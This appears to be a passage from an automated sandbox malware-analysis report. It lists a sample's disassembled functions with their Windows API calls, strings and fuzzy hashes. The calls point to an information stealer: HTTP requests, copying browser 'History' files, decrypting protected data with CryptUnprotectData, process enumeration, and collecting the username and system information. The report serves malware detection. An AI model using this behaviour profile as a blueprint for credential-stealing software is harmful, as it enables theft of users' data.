                                                                                                                                            • API ID: _sprintf$FileFind$CloseCopyFirstH_prolog3MatchNextPathSpec__flsbuf__output_l
                                                                                                                                            • String ID: %s\%s$%s\*
                                                                                                                                            • API String ID: 2813418133-2848263008
                                                                                                                                            • Opcode ID: 93b7b2d483ed08ebad9ec96e98d4baf67373475a4d06020eb07df079a55023a3
                                                                                                                                            • Instruction ID: 7607ab7dc9e1ea8983a23ebac51d7e62c5755459d65e668a90d06f831635e6f4
                                                                                                                                            • Opcode Fuzzy Hash: 93b7b2d483ed08ebad9ec96e98d4baf67373475a4d06020eb07df079a55023a3
                                                                                                                                            • Instruction Fuzzy Hash: 67513EB1900249ABDF21EFA1CC45BDE77B8FB08305F10442BFA09A7191EB7997198B59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040A91B, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 239networkcomfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040A93A
                                                                                                                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 0040A974
                                                                                                                                            • InternetReadFile.WININET(?,?,000003E8,?), ref: 0040A98E
                                                                                                                                            • _memmove.LIBCMT ref: 0040A9C3
                                                                                                                                            • _memset.LIBCMT ref: 0040A9F4
                                                                                                                                            • HttpQueryInfoA.WININET(?,0000001D,00000010,?,00000000), ref: 0040AA0A
                                                                                                                                            • CoCreateInstance.OLE32(0048C204,00000000,00000001,0048C214,?), ref: 0040AA2F
                                                                                                                                            • _memcpy_s.LIBCMT ref: 0040AB39
                                                                                                                                            • _memcpy_s.LIBCMT ref: 0040AB61
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileInternet_memcpy_s$CreateH_prolog3HttpInfoInstancePointerQueryRead_memmove_memset
                                                                                                                                            • String ID: text
                                                                                                                                            • API String ID: 1196634669-999008199
                                                                                                                                            • Opcode ID: fb669f038f5eabc95243b85fb899209f43c800fedbb3a149cee7529b4ab26db6
                                                                                                                                            • Instruction ID: 410ca0d4acb337754178cd56f838c6c7163e620845c71fb1d439925d21a799e0
                                                                                                                                            • Opcode Fuzzy Hash: fb669f038f5eabc95243b85fb899209f43c800fedbb3a149cee7529b4ab26db6
                                                                                                                                            • Instruction Fuzzy Hash: 46917AB1900209AFCB10DFA9C9859AFBBF9FF48304F50452EE906A7651D738EA44CF65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004044CB, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004044D5
                                                                                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000814), ref: 004044FB
                                                                                                                                            • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00800000,00000001), ref: 00404532
                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00800000,00000001), ref: 0040455B
                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040456C
                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007FF,?), ref: 0040459E
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004045A9
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 004045B5
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 004045C7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileH_prolog3_ReadSend
                                                                                                                                            • String ID: GET
                                                                                                                                            • API String ID: 1130177887-1805413626
                                                                                                                                            • Opcode ID: 4330253274fa074d6924468f3401460d5ca18ec45472ebd1f6c039cdf0fe093d
                                                                                                                                            • Instruction ID: 6606e9b2a4c1c8e9f1da7373a0cc474a60aa102224ac14b0ea6680722f91ae42
                                                                                                                                            • Opcode Fuzzy Hash: 4330253274fa074d6924468f3401460d5ca18ec45472ebd1f6c039cdf0fe093d
                                                                                                                                            • Instruction Fuzzy Hash: 50313CB150011CBFDB10AF14CC85AEA7AACFF54354F44807AF605A6190CB749E868FA8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040F7AE, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 154fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _sprintf.LIBCMT ref: 0040F804
                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 0040F817
                                                                                                                                            • _sprintf.LIBCMT ref: 0040F868
                                                                                                                                              • Part of subcall function 004658EA: __output_l.LIBCMT ref: 00465945
                                                                                                                                              • Part of subcall function 0040EFD7: __EH_prolog3.LIBCMT ref: 0040EFF6
                                                                                                                                              • Part of subcall function 0040EFD7: GetCurrentDirectoryA.KERNEL32(00000104,?,00000020), ref: 0040F025
                                                                                                                                              • Part of subcall function 0040EFD7: lstrcatA.KERNEL32(?,\temp), ref: 0040F034
                                                                                                                                              • Part of subcall function 0040EFD7: CopyFileA.KERNEL32 ref: 0040F041
                                                                                                                                              • Part of subcall function 0040B9E3: GetCurrentDirectoryA.KERNEL32(00000104,?,00481870,?,?), ref: 0040BA23
                                                                                                                                              • Part of subcall function 0040B9E3: lstrcatA.KERNEL32(?,\temp), ref: 0040BA35
                                                                                                                                              • Part of subcall function 0040B9E3: CopyFileA.KERNEL32 ref: 0040BA45
                                                                                                                                              • Part of subcall function 0040B9E3: _memset.LIBCMT ref: 0040BA53
                                                                                                                                              • Part of subcall function 0040B9E3: _sprintf.LIBCMT ref: 0040BA65
                                                                                                                                              • Part of subcall function 0040B9E3: DeleteFileA.KERNEL32(?), ref: 0040BB0F
                                                                                                                                            • FindNextFileA.KERNELBASE(?,?,00000104,00000000,?,?,00000000), ref: 0040F967
                                                                                                                                            • FindClose.KERNEL32(?,?,?,00000000), ref: 0040F978
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Find_sprintf$CopyCurrentDirectorylstrcat$CloseDeleteFirstH_prolog3Next__output_l_memset
                                                                                                                                            • String ID: %s\%s$%s\*$History
                                                                                                                                            • API String ID: 2764124315-2206966733
                                                                                                                                            • Opcode ID: 7f5088d5b16542a2f083d0cb61e994cfb1b01dcadc9e867274479cb1ce195a56
                                                                                                                                            • Instruction ID: 172440579869cfc328533d5625715f4d992c7b9f89af7ca31cbd78b67914fff9
                                                                                                                                            • Opcode Fuzzy Hash: 7f5088d5b16542a2f083d0cb61e994cfb1b01dcadc9e867274479cb1ce195a56
                                                                                                                                            • Instruction Fuzzy Hash: 14514B72D0024EAADF24AFA1DC45ADE7BBDEB08304F10443BF518B71A1E7359509DB58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045C719, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0045C738
                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,00000018), ref: 0045C76C
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0045C777
                                                                                                                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 0045C784
                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0045C7AB
                                                                                                                                            • _memset.LIBCMT ref: 0045C82D
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • LocalFree.KERNEL32(?), ref: 0045C84C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3KeyboardLayoutListLocal_memmove$AllocFreeInfoLocale_memset
                                                                                                                                            • String ID: /
                                                                                                                                            • API String ID: 680995659-4001269591
                                                                                                                                            • Opcode ID: 68e85b27c4b2c02bc59bb533936ba5db38566e56d3e94338c30a38f2a8ba7203
                                                                                                                                            • Instruction ID: d2f60e984a572d2e2357c9682b2ebebbcceb80fc740cbe1f17688bf41f24fa1b
                                                                                                                                            • Opcode Fuzzy Hash: 68e85b27c4b2c02bc59bb533936ba5db38566e56d3e94338c30a38f2a8ba7203
                                                                                                                                            • Instruction Fuzzy Hash: F44130B1D00249AFDB10EF95CC85AEEBBB8FF18305F50442EF905A7281D7785A48CBA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00462AE7, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 462COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: UT
                                                                                                                                            • API String ID: 0-894488996
                                                                                                                                            • Opcode ID: 9e7f3403d45aea5338fae40be0b1b35028cded203bd8500429c226252fec1f6f
                                                                                                                                            • Instruction ID: 381b217105d1a9ccf6701f7e94ebc3bebd3fd1db4ade14b56736db899b3bb080
                                                                                                                                            • Opcode Fuzzy Hash: 9e7f3403d45aea5338fae40be0b1b35028cded203bd8500429c226252fec1f6f
                                                                                                                                            • Instruction Fuzzy Hash: 2D021570E042899BDF25CF68C9807EE7BB1AF55304F14406FDC05AF346E6789A49CB9A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040C26E, Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 0040C29B
                                                                                                                                              • Part of subcall function 0046632E: __FF_MSGBANNER.LIBCMT ref: 00466347
                                                                                                                                              • Part of subcall function 0046632E: __NMSG_WRITE.LIBCMT ref: 0046634E
                                                                                                                                              • Part of subcall function 0046632E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004644D0,00000001,00000000,?,?,?,0046452E,004026BA), ref: 00466373
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0040C2AE
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 0040C2BB
                                                                                                                                            • Process32First.KERNEL32 ref: 0040C2CC
                                                                                                                                            • Process32Next.KERNEL32 ref: 0040C32D
                                                                                                                                            • FindCloseChangeNotification.KERNEL32(?,?,?,00000002,00000000), ref: 0040C339
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseProcess32$AllocateChangeCreateFindFirstHandleHeapNextNotificationSnapshotToolhelp32_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2639979032-0
                                                                                                                                            • Opcode ID: 80dd813c03d209d2e4b4b0a19dd07e5f41a083e9c39db473b859489b3066ee72
                                                                                                                                            • Instruction ID: 8cb5ccf0a92f4eee1468456703a6e3d8975e275d843bbaa67d7a451c3eca4d4c
                                                                                                                                            • Opcode Fuzzy Hash: 80dd813c03d209d2e4b4b0a19dd07e5f41a083e9c39db473b859489b3066ee72
                                                                                                                                            • Instruction Fuzzy Hash: 7A21B171914248CADB309FB59CC1AEEBBB5EF15314F20423FE855A7281E7399909CB19
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045C662, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0045C66C
                                                                                                                                            • GetSystemTime.KERNEL32(?,000000F4,00408184,?,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0045C68D
                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000001,00000000), ref: 0045C69A
                                                                                                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0045C6BD
                                                                                                                                              • Part of subcall function 0045F084: __EH_prolog3.LIBCMT ref: 0045F08E
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$System$H_prolog3H_prolog3_InformationLocalSpecificZone_memmove
                                                                                                                                            • String ID: UTC
                                                                                                                                            • API String ID: 473020483-2754919731
                                                                                                                                            • Opcode ID: e80f49777bdeb3dcd4d0f6b8683fcd224440563c94301b0de61d50856f469bad
                                                                                                                                            • Instruction ID: a6e807b422550104de7b34a9ec02689b8b6bf585770eab048daff1a2eb2116ed
                                                                                                                                            • Opcode Fuzzy Hash: e80f49777bdeb3dcd4d0f6b8683fcd224440563c94301b0de61d50856f469bad
                                                                                                                                            • Instruction Fuzzy Hash: F8112B71900519FEDF51ABA4DC49BDDB778FF08304F00447AE204F6050EB749A988B59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00408B9A, Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00408BAE
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00408BB5
                                                                                                                                            • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00408BCE
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 00408BE7
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00408BF0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3466090806-0
                                                                                                                                            • Opcode ID: f6b60f18e3b75f5300132b396d14cb5cb7c8ab9eebbd4682a116e17e2753ed75
                                                                                                                                            • Instruction ID: a8fd09539eaa712065da0e30151d70d03f436119c6652724c26ac0a97895f2e7
                                                                                                                                            • Opcode Fuzzy Hash: f6b60f18e3b75f5300132b396d14cb5cb7c8ab9eebbd4682a116e17e2753ed75
                                                                                                                                            • Instruction Fuzzy Hash: F2F017B6240208BFEB108F94DC0AF9E7B79EB44710F100076FA01E91A0D7B1AE54DB18
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0043F231, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 468COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove_memset
                                                                                                                                            • String ID: :memory:$B
                                                                                                                                            • API String ID: 3555123492-416490422
                                                                                                                                            • Opcode ID: 5a2eeec69648498b4bce697bfbbd7438755da5f9dbcc705fcd28248f83d7c208
                                                                                                                                            • Instruction ID: 6f6eded852676e904b8ebf02691694f459072a025562ce5b4955251353365c66
                                                                                                                                            • Opcode Fuzzy Hash: 5a2eeec69648498b4bce697bfbbd7438755da5f9dbcc705fcd28248f83d7c208
                                                                                                                                            • Instruction Fuzzy Hash: 2502D970D00205DFDB25DF69C941AABBBB0BF18304F24507FE854AB292D778D989CB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040B708, Relevance: 6.0, APIs: 4, Instructions: 48memoryencryptionCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040B72B
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040B743
                                                                                                                                            • _memmove.LIBCMT ref: 0040B758
                                                                                                                                            • LocalFree.KERNEL32(?), ref: 0040B764
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Local$AllocCryptDataFreeUnprotect_memmove
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3008826695-0
                                                                                                                                            • Opcode ID: a2d95048ae4514413510fa775965bf7c2cf5ff684005e378066432e91ba08773
                                                                                                                                            • Instruction ID: 09faf0bb1e47d17e47912390c66d0ef785e6495f5f977ce8cd37d01fb3800d3e
                                                                                                                                            • Opcode Fuzzy Hash: a2d95048ae4514413510fa775965bf7c2cf5ff684005e378066432e91ba08773
                                                                                                                                            • Instruction Fuzzy Hash: 6F01FF7A900218AFCB00AFE8DC8989EBBB9EB48310F144866F905E7254E7759D50CB54
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00451191, Relevance: 5.8, Strings: 4, Instructions: 801COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: DISTINCT$GROUP BY$ORDER BY$RIGHT PART OF ORDER BY
                                                                                                                                            • API String ID: 0-1884118544
                                                                                                                                            • Opcode ID: 98ff0f6f1cdb98c9e2235373eb166a62369a36b85ac6f4b19cd900b74fee8913
                                                                                                                                            • Instruction ID: 92c5e37f73975fbbfcfa429549e4f05660c2dea182d5555ff2fa2741f7855f66
                                                                                                                                            • Opcode Fuzzy Hash: 98ff0f6f1cdb98c9e2235373eb166a62369a36b85ac6f4b19cd900b74fee8913
                                                                                                                                            • Instruction Fuzzy Hash: 296279B1A00259AFDF11EF69C881AAE7BB1FF08308F14412AFD0497262D779DD95CB94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045F3B6, Relevance: 4.6, APIs: 3, Instructions: 72fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0045F3C0
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0045F035
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0045F064
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000298,0041126F,?), ref: 0045F3F9
                                                                                                                                            • FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 0045F48A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharFileFindMultiWide$FirstH_prolog3_Next
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1519118924-0
                                                                                                                                            • Opcode ID: 6b7ac3c6ea117c6d1f45df40d495fca01caab18508f0bdc34e3053ec84ccbef9
                                                                                                                                            • Instruction ID: 874565708512bc948300c4a707492597a98df35da8747f63d3999cd3391e6a6b
                                                                                                                                            • Opcode Fuzzy Hash: 6b7ac3c6ea117c6d1f45df40d495fca01caab18508f0bdc34e3053ec84ccbef9
                                                                                                                                            • Instruction Fuzzy Hash: 7F313071D001489FDB11DFA9C988ADEBBB8AF55304F10806FE419A7251DB789648CF65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045C174, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 0045C1A9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NameUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                            • Opcode ID: af54f39f4dbbccbcc3b7c2d165b39c99e8c6a3c56ba879fea6d5e423bb50f0bd
                                                                                                                                            • Instruction ID: 25f710cf62d12ea1997b44a1844ef9dfb7b67215ccd98f7021aed24778a3aa64
                                                                                                                                            • Opcode Fuzzy Hash: af54f39f4dbbccbcc3b7c2d165b39c99e8c6a3c56ba879fea6d5e423bb50f0bd
                                                                                                                                            • Instruction Fuzzy Hash: C2F03C716102188BDB30DFA8DC44BDDB7F8BB08309F00812ED459E3281DBB866088BA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0042F155, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetSystemInfo.KERNEL32(00497104,00000001,0043B9C4,?,00000000,00000104), ref: 0042F165
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                            • Opcode ID: 99754314e9ed1f5831ba337e93fc4d4b0f7ec100246388714b7b5099523136aa
                                                                                                                                            • Instruction ID: 8d4b3015f6b5da1f74a3f6194a75e82cbf9c63c808715d554696cfdb03f215d0
                                                                                                                                            • Opcode Fuzzy Hash: 99754314e9ed1f5831ba337e93fc4d4b0f7ec100246388714b7b5099523136aa
                                                                                                                                            • Instruction Fuzzy Hash: 7BD0A73239810027EA00B1A9FD07F2618418FD0B14F208437B100952C5D4D94052C12E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004074F3, Relevance: 162.7, APIs: 47, Strings: 45, Instructions: 1728sleepfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004074FD
                                                                                                                                            • CreateDirectoryA.KERNEL32(024C1058,00000000,00000001,00000000,00000000), ref: 004075D9
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(024C1058), ref: 004075EC
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040760E
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 00404320: __EH_prolog3.LIBCMT ref: 00404327
                                                                                                                                              • Part of subcall function 00404320: _strtok.LIBCMT ref: 00404348
                                                                                                                                              • Part of subcall function 00404320: _strtok.LIBCMT ref: 00404425
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407A5E
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407A88
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407AB2
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407AEC
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407B16
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407B47
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000), ref: 00407B70
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,?,?,?,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000), ref: 00407BFC
                                                                                                                                            • __time64.LIBCMT ref: 00407C29
                                                                                                                                            • __localtime64_s.LIBCMT ref: 00407C3C
                                                                                                                                            • _asctime_s.LIBCMT ref: 00407C4E
                                                                                                                                            • _fprintf.LIBCMT ref: 00407C85
                                                                                                                                            • _fprintf.LIBCMT ref: 00407CA7
                                                                                                                                            • _fprintf.LIBCMT ref: 00407CD5
                                                                                                                                            • _fprintf.LIBCMT ref: 00407D0E
                                                                                                                                            • _fprintf.LIBCMT ref: 00407D47
                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000001,00000000), ref: 00407D5A
                                                                                                                                            • _fprintf.LIBCMT ref: 00407D84
                                                                                                                                            • _fprintf.LIBCMT ref: 00407DB8
                                                                                                                                            • _fprintf.LIBCMT ref: 00407E4A
                                                                                                                                            • _fprintf.LIBCMT ref: 00407F63
                                                                                                                                            • _fprintf.LIBCMT ref: 00407FDB
                                                                                                                                            • _fprintf.LIBCMT ref: 00408053
                                                                                                                                            • _fprintf.LIBCMT ref: 004080CB
                                                                                                                                            • _fprintf.LIBCMT ref: 00408143
                                                                                                                                            • _fprintf.LIBCMT ref: 004081BF
                                                                                                                                            • _fprintf.LIBCMT ref: 0040821D
                                                                                                                                            • _fprintf.LIBCMT ref: 00408277
                                                                                                                                            • _fprintf.LIBCMT ref: 004082EF
                                                                                                                                            • _fprintf.LIBCMT ref: 00408368
                                                                                                                                            • _fprintf.LIBCMT ref: 004083DF
                                                                                                                                            • _fprintf.LIBCMT ref: 00408438
                                                                                                                                            • _fprintf.LIBCMT ref: 00408474
                                                                                                                                              • Part of subcall function 00403B46: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00403B58
                                                                                                                                              • Part of subcall function 00402CCF: _memmove.LIBCMT ref: 00402D20
                                                                                                                                            • _fprintf.LIBCMT ref: 004084BE
                                                                                                                                            • _fprintf.LIBCMT ref: 004084FA
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00408556
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 00408582
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004085C3
                                                                                                                                              • Part of subcall function 00409D6D: __EH_prolog3.LIBCMT ref: 00409D74
                                                                                                                                              • Part of subcall function 004067A7: __EH_prolog3.LIBCMT ref: 004067C6
                                                                                                                                              • Part of subcall function 004067A7: __wgetenv.LIBCMT ref: 004067D4
                                                                                                                                              • Part of subcall function 004067A7: __wgetenv.LIBCMT ref: 0040683D
                                                                                                                                              • Part of subcall function 0045BCA6: __EH_prolog3.LIBCMT ref: 0045BCC5
                                                                                                                                            • _fprintf.LIBCMT ref: 00407EEB
                                                                                                                                              • Part of subcall function 0045C174: GetUserNameA.ADVAPI32(?,?), ref: 0045C1A9
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(024C1058,00000001,00000000,ccount,00000000,00000000,?,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00408893
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0045F035
